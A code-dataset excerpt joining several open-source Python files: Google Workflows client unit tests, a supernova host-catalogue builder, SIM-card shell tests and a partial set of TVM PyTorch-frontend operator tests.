@pytest.mark.parametrize(
"transport_class",
[transports.WorkflowsGrpcTransport, transports.WorkflowsGrpcAsyncIOTransport],
)
def test_workflows_transport_channel_mtls_with_client_cert_source(transport_class):
with mock.patch(
"grpc.ssl_channel_credentials", autospec=True
) as grpc_ssl_channel_cred:
with mock.patch.object(
transport_class, "create_channel"
) as grpc_create_channel:
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
cred = ga_credentials.AnonymousCredentials()
with pytest.warns(DeprecationWarning):
with mock.patch.object(google.auth, "default") as adc:
adc.return_value = (cred, None)
transport = transport_class(
host="squid.clam.whelk",
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
adc.assert_called_once()
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
assert transport._ssl_channel_credentials == mock_ssl_cred
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize(
"transport_class",
[transports.WorkflowsGrpcTransport, transports.WorkflowsGrpcAsyncIOTransport],
)
def test_workflows_transport_channel_mtls_with_adc(transport_class):
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
with mock.patch.object(
transport_class, "create_channel"
) as grpc_create_channel:
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
mock_cred = mock.Mock()
with pytest.warns(DeprecationWarning):
transport = transport_class(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
def test_workflows_grpc_lro_client():
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
transport = client.transport
# Ensure that we have a api-core operations client.
assert isinstance(transport.operations_client, operations_v1.OperationsClient,)
# Ensure that subsequent calls to the property send the exact same object.
assert transport.operations_client is transport.operations_client
def test_workflows_grpc_lro_async_client():
client = WorkflowsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc_asyncio",
)
transport = client.transport
# Ensure that we have a api-core operations client.
assert isinstance(transport.operations_client, operations_v1.OperationsAsyncClient,)
# Ensure that subsequent calls to the property send the exact same object.
assert transport.operations_client is transport.operations_client
def test_workflow_path():
project = "squid"
location = "clam"
workflow = "whelk"
expected = "projects/{project}/locations/{location}/workflows/{workflow}".format(
project=project, location=location, workflow=workflow,
)
actual = WorkflowsClient.workflow_path(project, location, workflow)
assert expected == actual
def test_parse_workflow_path():
expected = {
"project": "octopus",
"location": "oyster",
"workflow": "nudibranch",
}
path = WorkflowsClient.workflow_path(**expected)
# Check that the path construction is reversible.
actual = WorkflowsClient.parse_workflow_path(path)
assert expected == actual
def test_common_billing_account_path():
billing_account = "cuttlefish"
expected = "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
actual = WorkflowsClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "mussel",
}
path = WorkflowsClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = WorkflowsClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "winkle"
expected = "folders/{folder}".format(folder=folder,)
actual = WorkflowsClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "nautilus",
}
path = WorkflowsClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = WorkflowsClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "scallop"
expected = "organizations/{organization}".format(organization=organization,)
actual = WorkflowsClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "abalone",
}
path = WorkflowsClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = WorkflowsClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "squid"
expected = "projects/{project}".format(project=project,)
actual = WorkflowsClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "clam",
}
path = WorkflowsClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = WorkflowsClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "whelk"
location = "octopus"
expected = "projects/{project}/locations/{location}".format(
project=project, location=location,
)
actual = WorkflowsClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "oyster",
"location": "nudibranch",
}
path = WorkflowsClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = WorkflowsClient.parse_common_location_path(path)
assert expected == actual
def test_client_with_default_client_info():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(
transports.WorkflowsTransport, "_prep_wrapped_messages"
) as prep:
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(
transports.WorkflowsTransport, "_prep_wrapped_messages"
) as prep:
transport_class = WorkflowsClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
@pytest.mark.asyncio
async def test_transport_close_async():
client = WorkflowsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc_asyncio",
)
with mock.patch.object(
type(getattr(client.transport, "grpc_channel")), "close"
) as close:
async with client:
close.assert_not_called()
close.assert_called_once()
def test_transport_close():
transports = {
"grpc": "_grpc_channel",
}
for transport, close_name in transports.items():
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
with mock.patch.object(
type(getattr(client.transport, close_name)), "close"
) as close:
with client:
close.assert_not_called()
close.assert_called_once()
def test_client_ctx():
transports = [
"grpc",
]
for transport in transports:
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
# Test client calls underlying transport.
with mock.patch.object(type(client.transport), "close") as close:
close.assert_not_called()
with client:
pass
close.assert_called()
@pytest.mark.parametrize(
"client_class,transport_class",
[
(WorkflowsClient, transports.WorkflowsGrpcTransport),
(WorkflowsAsyncClient, transports.WorkflowsGrpcAsyncIOTransport),
],
)
def test_api_key_credentials(client_class, transport_class):
with mock.patch.object(
google.auth._default, "get_api_key_credentials", create=True
) as get_api_key_credentials:
mock_cred = mock.Mock()
get_api_key_credentials.return_value = mock_cred
options = client_options.ClientOptions()
options.api_key = "api_key"
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=mock_cred,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
| googleapis/python-workflows | tests/unit/gapic/workflows_v1beta/test_workflows.py | Python | apache-2.0 | 94,960 | [
"Octopus"
] | cd6963ce83b39b858627fb76ca85b4a73592aefd97c0406dbc4b6a460f2093f8 |
#!/usr/local/bin/python3.5
import json
import re
import os
import math
import codecs
import urllib
import requests
import ads
import gzip
import statistics
import time
from html import unescape
from glob import glob
from tqdm import tqdm
from collections import OrderedDict
from astropy.coordinates import SkyCoord as coord
from astropy import units as un
from astropy.time import Time as astrotime
from copy import deepcopy
from math import sqrt
from digits import *
hosts = OrderedDict()
def get_event_filename(name):
return(name.replace('/', '_'))
def touch(fname, times=None):
with open(fname, 'a'):
os.utime(fname, times)
with open('rep-folders.txt', 'r') as f:
repfolders = f.read().splitlines()
files = []
for rep in repfolders:
files += glob('../' + rep + "/*.json") + glob('../' + rep + "/*.json.gz")
for fcnt, eventfile in enumerate(tqdm(sorted(files, key=lambda s: s.lower()))):
#if fcnt > 1000:
# break
fileeventname = os.path.splitext(os.path.basename(eventfile))[0].replace('.json','')
if not os.path.isfile(eventfile):
continue
if eventfile.split('.')[-1] == 'gz':
with gzip.open(eventfile, 'rt') as f:
filetext = f.read()
else:
with open(eventfile, 'r') as f:
filetext = f.read()
item = json.loads(filetext, object_pairs_hook=OrderedDict)
item = item[list(item.keys())[0]]
if 'host' in item:
hngs = [x['value'] for x in item['host'] if ((x['kind'] != 'cluster') if 'kind' in x else True)]
hncs = [x['value'] for x in item['host'] if ((x['kind'] == 'cluster') if 'kind' in x else False)]
hng = ''
hnc = ''
for ho in hosts:
hog = [x for x in hosts[ho]['host'] if hosts[ho]['kind'] != 'cluster']
hoc = [x for x in hosts[ho]['host']]
if len(list(set(hngs).intersection(hog))):
hng = ho
hosts[ho]['host'] = list(set(hosts[ho]['host'] + hngs))
if len(list(set(hncs).intersection(hoc))):
hnc = ho
hosts[ho]['host'] = list(set(hosts[ho]['host'] + hncs + hngs))
if hng and hnc:
break
if not hng and hngs:
hng = hngs[0]
hosts[hng] = OrderedDict([('host', hngs), ('kind', 'galaxy'), ('events', []), ('eventdates', []),
('types', []), ('photocount', 0), ('spectracount', 0), ('lumdist', ''),
('redshift', ''), ('hostra', ''), ('hostdec', '')])
if not hnc and hncs:
hnc = hncs[0]
hosts[hnc] = OrderedDict([('host', hncs + hngs), ('kind', 'cluster'), ('events', []), ('eventdates', []),
('types', []), ('photocount', 0), ('spectracount', 0), ('lumdist', ''),
('redshift', ''), ('hostra', ''), ('hostdec', '')])
for hi, hn in enumerate([hng, hnc]):
if not hn:
continue
hosts[hn]['events'].append({'name':item['name'],'img':('ra' in item and 'dec' in item)})
if (not hosts[hn]['lumdist'] or '*' in hosts[hn]['lumdist']) and 'lumdist' in item:
ldkinds = [x['kind'] if 'kind' in x else '' for x in item['lumdist']]
try:
ind = ldkinds.index('host')
except ValueError:
hosts[hn]['lumdist'] = item['lumdist'][0]['value'] + '*'
else:
hosts[hn]['lumdist'] = item['lumdist'][ind]['value']
if (not hosts[hn]['redshift'] or '*' in hosts[hn]['redshift']) and 'redshift' in item:
zkinds = [x['kind'] if 'kind' in x else '' for x in item['redshift']]
try:
ind = zkinds.index('host')
except ValueError:
hosts[hn]['redshift'] = item['redshift'][0]['value'] + '*'
else:
hosts[hn]['redshift'] = item['redshift'][ind]['value']
if not hosts[hn]['hostra'] and 'hostra' in item:
hosts[hn]['hostra'] = item['hostra'][0]['value']
if not hosts[hn]['hostdec'] and 'hostdec' in item:
hosts[hn]['hostdec'] = item['hostdec'][0]['value']
if 'discoverdate' in item and item['discoverdate']:
datestr = item['discoverdate'][0]['value'].replace('/', '-')
if datestr.count('-') == 1:
datestr += '-01'
elif datestr.count('-') == 0:
datestr += '-01-01'
try:
hosts[hn]['eventdates'].append(astrotime(datestr, format = 'isot').unix)
except:
hosts[hn]['eventdates'].append(float("inf"))
else:
hosts[hn]['eventdates'].append(float("inf"))
if 'claimedtype' in item:
cts = []
for ct in item['claimedtype']:
sct = ct['value'].strip('?')
if sct:
cts.append(sct)
hosts[hn]['types'] = list(set(hosts[hn]['types']).union(cts))
if 'photometry' in item:
hosts[hn]['photocount'] += len(item['photometry'])
if 'spectra' in item:
hosts[hn]['spectracount'] += len(item['spectra'])
curtime = time.time()
centrate = 100.0*365.25*24.0*60.0*60.0
for hn in hosts:
finitedates = sorted([x for x in hosts[hn]['eventdates'] if x != float("inf")])
if len(finitedates) >= 2:
datediff = curtime - finitedates[0]
lamb = float(len(finitedates))/(curtime - finitedates[0])*centrate
hosts[hn]['rate'] = (pretty_num(lamb, sig = 3) + ',' +
pretty_num(lamb/sqrt(float(len(finitedates))), sig = 3))
else:
hosts[hn]['rate'] = ''
hosts[hn]['events'] = [x for (y,x) in sorted(zip(hosts[hn]['eventdates'], hosts[hn]['events']), key = lambda ev: ev[0])]
del(hosts[hn]['eventdates'])
# Convert to array since that's what datatables expects
hosts = list(hosts.values())
jsonstring = json.dumps(hosts, indent='\t', separators=(',', ':'), ensure_ascii=False)
with open('../hosts.json', 'w') as f:
f.write(jsonstring)
minjsonstring = json.dumps(hosts, separators=(',', ':'), ensure_ascii=False)
with gzip.open("../hosts.min.json.gz", 'wt') as fff:
touch("../hosts.min.json")
fff.write(minjsonstring)
| jparrent/sne | scripts/make-host-catalog.py | Python | mit | 6,395 | [
"Galaxy"
] | e75c3ae98c88c482e576f389cdbffcc81d9abfc5fc29a434d74d7b15f94885f4 |
#!/usr/bin/python
# LICENSE: GPL2
# (c) 2015 Kamil Wartanowicz
import sys,os.path
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
from sim import sim_router
from sim import sim_card
from sim import sim_shell
from util import hextools
from util import types_g
from util import types
import unittest
import logging
from sim import sim_reader
from sim import sim_ctrl_2g
from sim import sim_ctrl_3g
MODE_SIM = sim_reader.MODE_PYSCARD
SIM_TYPE = types.TYPE_USIM
class TestSimShell(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.simCard = sim_card.SimCard(mode=MODE_SIM)
cls.simCard.removeAllReaders()
try:
cls.simCard.connect(0)
except Exception as e:
if "no card in reader" in str(e):
cls.simCard.stop()
raise Exception("No card in reader")
cls.simRouter = sim_router.SimRouter(cards=[cls.simCard], type=SIM_TYPE, mode=sim_router.SIMTRACE_OFFLINE)
cls.simRouter.run(mode=sim_router.ROUTER_MODE_DISABLED)
cls.shell = cls.simRouter.shell
def test_01_read_iccid(self):
status, data = self.shell.read("/2FE2")
self.shell.assertOk(status, data)
value = types.getDataValue(data)
valueLength = len(value)
self.assertGreater(valueLength, 9, "Invalid ICCID length")
def test_02_read_imsi(self):
path = "/ADF0/EF_IMSI"
logging.info("test path: %s" %path)
status, data1 = self.shell.readi(path)
self.shell.assertOk(status, data1)
path = "/7F20/EF_IMSI"
logging.info("test path: %s" %path)
status, data2 = self.shell.readi(path)
self.shell.assertOk(status, data2)
status, data = self.shell.cd("/")
self.shell.assertOk(status, data)
path = "EF_IMSI"
logging.info("test path: %s" %path)
status, data3 = self.shell.readi(path)
self.shell.assertOk(status, data3)
path = "/ADF_USIM"
logging.info("test path: %s" %path)
status, data = self.shell.cd(path)
self.shell.assertOk(status, data)
path = "./6F07"
logging.info("test path: %s" %path)
status, data4 = self.shell.readi(path)
self.shell.assertOk(status, data4)
self.assertEqual(data1, data2)
self.assertEqual(data1, data3)
self.assertEqual(data1, data4)
def test_03_read_imsi_raw(self):
status, data1 = self.shell.read("/ADF0/EF_IMSI")
self.shell.assertOk(status, data1)
status, data = self.shell.cd("/")
self.shell.assertOk(status, data)
status, data2 = self.shell.read("EF_IMSI")
self.shell.assertOk(status, data2)
imsi1 = types.getDataValue(data1)
imsi2 = types.getDataValue(data2)
self.assertEqual(imsi1, imsi2)
imsiRawLength = len(imsi1)
self.assertGreater(imsiRawLength, 14+3, "Invalid imsi raw length")
def test_04_get_plmn(self):
status, data1 = self.shell.get_plmn()
self.shell.assertOk(status, data1)
self.assertGreaterEqual(len(data1), 5*2)
self.assertLessEqual(len(data1), 6*2)
status, data2 = self.shell.readi("EF_IMSI")
self.shell.assertOk(status, data2)
self.assertTrue(data1 in data2)
def test_05_read_arr(self):
status, data = self.shell.read("/2F06")
self.shell.assertOk(status, data)
def test_06_create_file(self):
# Create DF and EF using absolute paths
dirPath = "/DEAD/"
try:
self.shell.delete(dirPath)
except:
pass
status, out = self.shell.create(dirPath)
self.shell.assertOk(status, out)
status, out = self.shell.delete(dirPath)
self.shell.assertOk(status, out)
dirPath = "/ADF0/DEAD/"
filePath = "/ADF0/DEAD/BEEF"
try:
self.shell.delete(dirPath)
except:
pass
status, out = self.shell.create(dirPath)
self.shell.assertOk(status, out)
status, out = self.shell.create(filePath)
self.shell.assertOk(status, out)
status, out = self.shell.delete(filePath)
self.shell.assertOk(status, out)
status, out = self.shell.delete(dirPath)
self.shell.assertOk(status, out)
def test_07_create_file_relative(self):
# Create DF and EF using relative paths
dirPath = "./DEAD/"
filePath = "./BEEF"
dirPath2 = "./DEAF/"
try:
self.shell.delete(dirPath)
except:
pass
status, out = self.shell.create(dirPath)
self.shell.assertOk(status, out)
status, out = self.shell.create(filePath)
self.shell.assertOk(status, out)
status, out = self.shell.create(dirPath2)
self.shell.assertOk(status, out)
status, out = self.shell.create(filePath)
self.shell.assertOk(status, out)
status, out = self.shell.delete(dirPath2)
self.shell.assertOk(status, out)
status, out = self.shell.delete(dirPath)
self.shell.assertOk(status, out)
def test_08_create_adf(self):
# Get number of EF_DIR records
status, data = self.shell.read("/2F00")
self.shell.assertOk(status, data)
numOfRecords = len(data.split(';')) - 1
# Use the next free Id
dirPath = "/ADF%d/" % numOfRecords
try:
self.shell.delete(dirPath)
except:
pass
status, out = self.shell.create(dirPath)
if status == "status NOK":
raise unittest.SkipTest(
"""Known issue: ADF creation doesn't work for some SIM cards
(INCORRECT_PARAMETER_IN_DATA_FIELD is returned)""")
#self.shell.assertOk(status, out)
status, out = self.shell.delete(dirPath)
self.shell.assertOk(status, out)
def test_09_pwd(self):
dirPath = "/7F10/5F3A"
name = "DF_PHONEBOOK"
status, out = self.shell.cd(dirPath)
self.shell.assertOk(status, out)
status, out = self.shell.pwd()
self.shell.assertOk(status, out)
path = types.getDataValue(out)
#compare to directory
self.assertEqual(path, "path=%s/,name=%s,simId=0" %(dirPath, name))
def test_10_ls(self):
dirPath = "/"
status, out = self.shell.cd(dirPath)
self.shell.assertOk(status, out)
status, out = self.shell.ls()
self.shell.assertOk(status, out)
files = types.getDataValue(out)
self.assertTrue(files)
dirPath = "/7F10"
status, out = self.shell.cd(dirPath)
self.shell.assertOk(status, out)
status, out = self.shell.ls()
self.shell.assertOk(status, out)
files = types.getDataValue(out)
self.assertTrue("5F3A/" in files, "Files: %s" %files)
def test_11_resize(self):
filePath = "/ADF0/DEAD/BEEF"
parentPath = types.parentDirFromPath(filePath) + '/'
# Cleanup
try:
self.shell.delete(parentPath)
except:
pass
# Create temporary dir and file (linear)
fileType = types_g.fileDescriptor.LINEAR_FIXED_STRUCTURE
fileSize = 0x30
recordLength = 0x10
status, out = self.shell.create(filePath,
"fileType=%X,fileSize=%X,recordLength=%X" \
% (fileType, fileSize, recordLength))
self.shell.assertOk(status, out)
# Increase the size of the file (by 2 new records) with a pattern
newFileSize = fileSize + recordLength * 2
pattern = types.addTrailingBytes('', 0xA5, recordLength-4) # not the whole record length
status, out = self.shell.resize(filePath, hex(newFileSize), pattern)
self.shell.assertOk(status, out)
# Check the data after resize
status, data = self.shell.read(filePath)
self.shell.assertOk(status, data)
value = types.getDataValue(data).replace(';', '')
self.assertEqual(len(value)/2, newFileSize)
# Decrease the size of the file to one record
status, out = self.shell.resize(filePath, hex(recordLength))
self.shell.assertOk(status, out)
status, out = self.shell.delete(parentPath)
self.shell.assertOk(status, out)
@unittest.skip("The EXTEND command is probably only supported by Gemalto")
def test_12_extend(self):
filePath = "/ADF0/DEAD/BEEF"
parentPath = types.parentDirFromPath(filePath) + '/'
# Cleanup
try:
self.shell.delete(parentPath)
except:
pass
# Create temporary dir and file (linear)
fileType = types_g.fileDescriptor.LINEAR_FIXED_STRUCTURE
fileSize = 0x30
recordLength = 0x10
status, out = self.shell.create(filePath,
"fileType=%X,fileSize=%X,recordLength=%X" \
% (fileType, fileSize, recordLength))
self.shell.assertOk(status, out)
# Increase the size of the file (by 2 new records) with a pattern
numOfRecordsToExtend = 2
status, out = self.shell.extend(filePath, numOfRecordsToExtend)
self.shell.assertOk(status, out)
# Check the data after extension
status, data = self.shell.read(filePath)
self.shell.assertOk(status, data)
value = types.getDataValue(data).replace(';', '')
self.assertEqual(len(value)/2, fileSize + numOfRecordsToExtend * recordLength)
status, out = self.shell.delete(parentPath)
self.shell.assertOk(status, out)
@classmethod
def tearDownClass(cls):
cls.simCard.stop()
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO, format='%(message)s')
unittest.main() | kamwar/simLAB | tests/live/test_shell.py | Python | gpl-2.0 | 9,808 | [
"ADF"
] | d96d6bc109c208ad680de55934e060bbcddf889a78083e4481896ed8d8b1cbf3 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=import-self, invalid-name, unused-argument
"""Unit tests for various models and operators"""
from time import time
import os
import sys
from scipy.stats import t as tdistr
import numpy as np
import torch
import torchvision
from torch.nn import Module
import tvm
from tvm import relay
from tvm.contrib import graph_runtime
from tvm.contrib.nvcc import have_fp16
import tvm.testing
from packaging import version as package_version
sys.setrecursionlimit(10000)
def list_ops(expr):
class OpLister(tvm.relay.ExprVisitor):
def visit_op(self, expr):
if expr not in self.node_set:
self.node_list.append(expr)
return super().visit_op(expr)
def list_nodes(self, expr):
self.node_set = {}
self.node_list = []
self.visit(expr)
return self.node_list
return OpLister().list_nodes(expr)
def assert_shapes_match(tru, est):
if tru.shape != est.shape:
msg = "Output shapes {} and {} don't match"
raise AssertionError(msg.format(tru.shape, est.shape))
def load_torchvision(model_name):
"""Given a model name, returns a Torchvision model in eval mode as well
as an example input."""
with torch.no_grad():
if model_name.startswith("inception"):
height = width = 299
mean = [0.5, 0.5, 0.5]
std = [0.5, 0.5, 0.5]
else:
height = width = 224
mean = [0.485, 0.456, 0.406]
std = [0.229, 0.224, 0.225]
input_shape = [1, 3, height, width]
input_data = torch.randn(input_shape).float()
for channel in range(3):
input_data[:, channel] -= mean[channel]
input_data[:, channel] /= std[channel]
if model_name.startswith("googlenet"):
model = getattr(torchvision.models, model_name)(pretrained=True, aux_logits=True)
else:
model = getattr(torchvision.models, model_name)(pretrained=True)
model = model.float().eval()
return model, [input_data]
def load_pretrainedmodels(model_name):
"""Given a model name, returns a pretrainedmodels.pytorch model in eval
mode as well as an example input."""
import pretrainedmodels # https://github.com/Cadene/pretrained-models.pytorch
model = getattr(pretrainedmodels, model_name)().float().eval()
input_shape = [1, *model.input_size]
input_data = torch.rand(input_shape).float() * 256
for channel in range(3):
input_data[:, channel] -= model.mean[channel]
input_data[:, channel] /= model.std[channel]
return model, [input_data]
def load_model(model_name):
"""Given a model name, returns a model as well as an example input."""
if hasattr(torchvision.models, model_name):
return load_torchvision(model_name)
try:
import pretrainedmodels
if hasattr(pretrainedmodels, model_name):
return load_pretrainedmodels(model_name)
except ModuleNotFoundError:
raise ModuleNotFoundError("Please install pretrainedmodels.pytorch")
raise RuntimeError("Model not supported")
def confidence_interval(mean, stdev, count, alpha=0.01):
"""Returns the lower and upper bounds of the confidence interval of a random
variable. Confidence is 1 - alpha (default confidence is 99%)."""
stdval = tdistr.ppf(1 - alpha / 2, count - 1)
lower, upper = mean + np.array([-1, 1]) * stdval * stdev / np.sqrt(count)
return lower, upper
def measure_latency(model, input_shapes, output_shapes, thresh, dryruns=40):
"""Compute the latency of the given model"""
latencies = []
count = 0
while True:
if isinstance(model, Module):
input_data = [torch.rand(shape).float() for shape in input_shapes]
if torch.cuda.is_available():
input_data = list(map(lambda x: x.cuda(), input_data))
model = model.cuda()
t_start = time()
with torch.no_grad():
model(*input_data)
t_end = time()
latencies.append(t_end - t_start)
else:
input_data = {}
for i, shape in enumerate(input_shapes):
name = "input" + str(i)
arr = np.random.random(shape).astype("float32")
input_data[name] = tvm.nd.array(arr)
t_start = time()
model.set_input(**input_data)
model.run()
for i, shape in enumerate(output_shapes):
arr = np.zeros(shape).astype("float32")
model.get_output(i, tvm.nd.array(arr))
t_end = time()
count += 1
if count < dryruns:
continue
latencies.append(t_end - t_start)
mean = np.mean(latencies)
stdev = np.std(latencies)
sample_size = len(latencies)
if sample_size > dryruns:
lower, upper = confidence_interval(mean, stdev, sample_size)
est = (upper + lower) / 2
err = (upper - lower) / 2
if err < thresh:
return est
def verify_model(model_name, input_data=[], custom_convert_map={}, rtol=1e-5, atol=1e-5):
"""Assert that the output of a compiled model matches with that of its
baseline."""
if isinstance(model_name, str):
baseline_model, baseline_input = load_model(model_name)
elif isinstance(input_data, list):
baseline_model = model_name
baseline_input = input_data
elif isinstance(input_data, torch.Tensor) or len(input_data.shape) == 0:
baseline_model = model_name
baseline_input = [input_data]
else:
assert False, "Unexpected input format"
if torch.cuda.is_available():
if isinstance(baseline_model, torch.nn.Module):
baseline_model = baseline_model.cuda()
baseline_input = [inp.cuda() for inp in baseline_input]
with torch.no_grad():
baseline_outputs = baseline_model(*baseline_input)
if isinstance(baseline_outputs, tuple):
baseline_outputs = tuple(out.cpu().numpy() for out in baseline_outputs)
else:
baseline_outputs = (baseline_outputs.cpu().numpy(),)
trace = torch.jit.trace(baseline_model, baseline_input)
if isinstance(baseline_model, torch.nn.Module):
trace = trace.float().eval()
if torch.cuda.is_available():
trace = trace.cuda()
else:
trace = trace.cpu()
input_names = ["input{}".format(idx) for idx, inp in enumerate(baseline_input)]
input_shapes = list(zip(input_names, [inp.shape for inp in baseline_input]))
mod, params = relay.frontend.from_pytorch(trace, input_shapes, custom_convert_map)
compiled_input = dict(zip(input_names, [inp.cpu().numpy() for inp in baseline_input]))
with tvm.transform.PassContext(opt_level=3):
for target, ctx in tvm.testing.enabled_targets():
relay_graph, relay_lib, relay_params = relay.build(mod, target=target, params=params)
relay_model = graph_runtime.create(relay_graph, relay_lib, ctx)
relay_model.set_input(**relay_params)
for name, inp in compiled_input.items():
relay_model.set_input(name, inp)
relay_model.run()
for i, baseline_output in enumerate(baseline_outputs):
compiled_output = relay_model.get_output(i).asnumpy()
assert_shapes_match(baseline_output, compiled_output)
tvm.testing.assert_allclose(baseline_output, compiled_output, rtol=rtol, atol=atol)
del model_name
del baseline_model
torch.cuda.empty_cache()
# Single operator tests
@tvm.testing.uses_gpu
def test_forward_pixel_shuffle():
torch.set_grad_enabled(False)
input_shape = [1, 144, 16, 16]
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.PixelShuffle(2).float().eval(), input_data=input_data)
verify_model(torch.nn.PixelShuffle(3).float().eval(), input_data=input_data)
verify_model(torch.nn.PixelShuffle(4).float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_add():
torch.set_grad_enabled(False)
input_shape = [10]
class Add1(Module):
def forward(self, *args):
return args[0] + args[0]
class Add2(Module):
def forward(self, *args):
return args[0] + 1
class Add3(Module):
def forward(self, *args):
ones = torch.ones(input_shape, dtype=torch.float)
if torch.cuda.is_available():
ones = ones.cuda()
return args[0] + ones
class Add4(Module):
def forward(self, *args):
ones = torch.ones([], dtype=torch.float)
if torch.cuda.is_available():
ones = ones.cuda()
return args[0] + ones
input_data = torch.rand(input_shape).float()
verify_model(Add1().float().eval(), input_data=input_data)
verify_model(Add2().float().eval(), input_data=input_data)
verify_model(Add3().float().eval(), input_data=input_data)
verify_model(Add4().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_subtract():
torch.set_grad_enabled(False)
input_shape = [10]
class Subtract1(Module):
def forward(self, *args):
return args[0] - args[0]
class Subtract2(Module):
def forward(self, *args):
return args[0] - 1
class Subtract3(Module):
def forward(self, *args):
ones = torch.ones(input_shape)
if torch.cuda.is_available():
ones = ones.cuda()
return args[0] - ones
class Subtract4(Module):
def forward(self, *args):
ones = torch.ones([])
if torch.cuda.is_available():
ones = ones.cuda()
return args[0] - ones
input_data = torch.rand(input_shape).float()
verify_model(Subtract1().float().eval(), input_data=input_data)
verify_model(Subtract2().float().eval(), input_data=input_data)
verify_model(Subtract3().float().eval(), input_data=input_data)
verify_model(Subtract4().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_multiply():
torch.set_grad_enabled(False)
input_shape = [10]
class Multiply1(Module):
def forward(self, *args):
return args[0] * args[0]
class Multiply2(Module):
def forward(self, *args):
return args[0] * 1.0
class Multiply3(Module):
def forward(self, *args):
ones = torch.ones(input_shape)
if torch.cuda.is_available():
ones = ones.cuda()
return args[0] * ones
class Multiply4(Module):
def forward(self, *args):
ones = torch.ones([])
if torch.cuda.is_available():
ones = ones.cuda()
return args[0] * ones
input_data = torch.rand(input_shape).float()
verify_model(Multiply1().float().eval(), input_data=input_data)
verify_model(Multiply2().float().eval(), input_data=input_data)
verify_model(Multiply3().float().eval(), input_data=input_data)
verify_model(Multiply4().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_min_max():
class Max(Module):
def forward(self, inp):
return torch.max(inp)
class Min(Module):
def forward(self, inp):
return torch.min(inp)
class Max2(Module):
def forward(self, inp):
out, _ = torch.max(inp, 1, keepdim=True)
return out
class Min2(Module):
def forward(self, inp):
out, _ = torch.min(inp, 0, keepdim=False)
return out
class Max3(Module):
def forward(self, lhs, rhs):
return torch.max(lhs, rhs)
class Min3(Module):
def forward(self, lhs, rhs):
return torch.min(lhs, rhs)
input_data = [torch.rand((10, 10)), torch.rand((10, 10))]
verify_model(Max(), input_data=input_data[0])
